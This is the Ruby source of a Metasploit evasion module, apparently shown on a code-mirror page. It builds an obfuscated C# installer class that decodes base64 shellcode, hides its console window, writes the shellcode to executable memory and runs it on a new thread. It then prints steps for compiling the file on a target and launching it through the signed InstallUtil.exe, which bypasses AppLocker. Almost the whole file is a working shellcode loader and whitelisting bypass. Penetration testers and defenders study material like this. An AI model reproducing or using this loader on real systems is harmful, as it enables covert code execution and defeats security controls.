Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/evasion/windows/applocker_evasion_install_util.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Evasion

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Applocker Evasion - .NET Framework Installation Utility',

13
        'Description' => %q{

14
          This module will assist you in evading Microsoft Windows

15
          Applocker and Software Restriction Policies.

16
          This technique utilises the Microsoft signed binary

17
          InstallUtil.exe to execute user supplied code.

18
        },

19
        'Author' => [

20
          'Nick Tyrer <@NickTyrer>', # module development

21
          'Casey Smith' # install_util bypass research

22
        ],

23
        'License' => MSF_LICENSE,

24
        'Platform' => 'win',

25
        'Arch' => [ARCH_X86, ARCH_X64],

26
        'Targets' => [['Microsoft Windows', {}]],

27
        'References' => [['URL', 'https://attack.mitre.org/techniques/T1118/']]

28
      )

29
    )

30


31
    register_options(

32
      [

33
        OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt'])

34
      ]

35
    )

36
  end

37


38
  def build_payload

39
    Rex::Text.encode_base64(payload.encoded)

40
  end

41


42
  def obfu

43
    Rex::Text.rand_text_alpha 8

44
  end

45


46
  def install_util

47
    esc = build_payload

48
    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]

49
    <<~HEREDOC

50
      using System;

51
      namespace #{mod[12]}

52
      {

53
      public class #{mod[11]} { public static void Main() { } }

54
      [System.ComponentModel.RunInstaller(true)]

55
      public class #{mod[10]} : System.Configuration.Install.Installer

56
      {

57
      private static Int32 #{mod[0]}=0x1000;

58
      private static IntPtr #{mod[1]}=(IntPtr)0x40;

59
      private static UInt32 #{mod[2]} = 0xFFFFFFFF;

60
      [System.Runtime.InteropServices.DllImport("kernel32")]

61
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

62
      [System.Runtime.InteropServices.DllImport("kernel32")]

63
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

64
      [System.Runtime.InteropServices.DllImport("kernel32")]

65
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

66
      [System.Runtime.InteropServices.DllImport("user32.dll")]

67
      static extern bool ShowWindow(IntPtr #{mod[3]}, int nCmdShow);

68
      [System.Runtime.InteropServices.DllImport("Kernel32")]

69
      private static extern IntPtr GetConsoleWindow();

70
      const int #{mod[4]} = 0;

71
      public override void Uninstall(System.Collections.IDictionary s)

72
      {

73
      IntPtr #{mod[3]};

74
      #{mod[3]} = GetConsoleWindow();

75
      ShowWindow(#{mod[3]}, #{mod[4]});

76
      string #{mod[5]} = "#{esc}";

77
      byte[] #{mod[6]} = Convert.FromBase64String(#{mod[5]});

78
      byte[] #{mod[7]} = #{mod[6]};

79
      IntPtr #{mod[8]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[7]}.Length, #{mod[0]}, #{mod[1]});

80
      System.Runtime.InteropServices.Marshal.Copy(#{mod[7]}, 0, #{mod[8]}, #{mod[7]}.Length);

81
      IntPtr #{mod[9]} = IntPtr.Zero;

82
      WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[8]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[2]});

83
      }

84
      }

85
      }

86
    HEREDOC

87
  end

88


89
  def file_format_filename(name = '')

90
    name.empty? ? @fname : @fname = name

91
  end

92


93
  def create_files

94
    f1 = datastore['FILENAME'].empty? ? 'install_util.txt' : datastore['FILENAME']

95
    f1 << '.txt' unless f1.downcase.end_with?('.txt')

96
    file1 = install_util

97
    file_format_filename(f1)

98
    file_create(file1)

99
  end

100


101
  def instructions

102
    print_status "Copy #{datastore['FILENAME']} to the target"

103
    if payload.arch.first == ARCH_X86

104
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}"

105
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}"

106
    else

107
      print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}"

108
      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}"

109
    end

110
  end

111


112
  def run

113
    create_files

114
    instructions

115
  end

116
end

117


118